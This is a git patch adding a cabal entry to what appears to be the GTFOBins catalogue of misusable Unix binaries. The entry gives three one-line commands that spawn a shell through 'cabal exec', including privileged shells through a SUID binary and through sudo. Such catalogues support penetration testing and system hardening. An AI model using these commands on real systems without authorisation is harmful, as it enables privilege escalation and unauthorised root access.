From 182c5d3b48c4918b273d7da24635979de20bd24d Mon Sep 17 00:00:00 2001 From: Miguel R Date: Fri, 16 Dec 2022 18:01:10 +0100 Subject: [PATCH] Add cabal Co-authored-by: Andrea Cardaci --- _gtfobins/cabal.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 _gtfobins/cabal.md diff --git a/_gtfobins/cabal.md b/_gtfobins/cabal.md new file mode 100644 index 0000000..c2611df --- /dev/null +++ b/_gtfobins/cabal.md @@ -0,0 +1,9 @@ +--- +functions: + shell: + - code: cabal exec -- /bin/sh + suid: + - code: ./cabal exec -- /bin/sh -p + sudo: + - code: sudo cabal exec -- /bin/sh +---